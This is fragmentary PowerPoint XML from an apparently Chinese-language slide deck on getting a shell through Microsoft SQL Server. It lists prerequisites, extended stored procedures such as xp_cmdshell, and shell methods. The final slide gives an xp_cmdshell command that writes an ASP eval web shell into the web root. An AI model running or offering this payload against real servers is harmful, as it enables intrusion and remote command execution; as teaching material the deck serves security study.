              <a:buChar char="Ø"/>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通过扩展存储过程</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Helvetica"/>
              </a:rPr>
              <a:t>拿</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shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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前提：数据库是</a:t>
            </a:r>
            <a:r>
              <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db_owner</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Helvetica"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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涉及到的的扩展存储过程：xpcmdshell、xp_dirtree、xp_subdirs、xp_regread</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55710C2-F069-3C4B-A4E2-CEF2B3D245E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2486524" y="1962039"/>
          <a:ext cx="7218950" cy="2821035"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{3B4B98B0-60AC-42C2-AFA5-B58CD77FA1E5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3609475">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3082114103"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3609475">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3043997396"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="609600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>扩展存储过程</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="726465956"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="442287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>xp_cmdshell</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>直接执行系统命令</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3858362799"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="442287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>xp_regread</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>进行注册表读取</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1222394948"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="442287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>xp_regwrite</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>写入注册表</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3899759064"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="442287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>xp_dirtree</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>进行列目录操作</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="731459479"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="442287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>xp_ntsec_enumdomains</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>查看domain信息</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3565228432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32560714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a:t>MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7956BA4-BB21-4982-B11F-09A2D7BE5396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893662"/>
            <a:ext cx="11035409" cy="603241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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>总结</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条件</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marL="228594" indent="-228594">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Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径已知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用存储过程写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a: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marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a: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marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本地存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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直接利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sharpsqltools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行命令写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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进行利用 </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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BEF9A39-DD9D-4752-BCED-DCC7AAD74E12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199615" y="3353931"/>
            <a:ext cx="9347200" cy="410427"/>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ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'echo ^&lt;%eval request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>")%^&gt; &gt; c:\inetpub\wwwroot\shell.asp';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1867" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
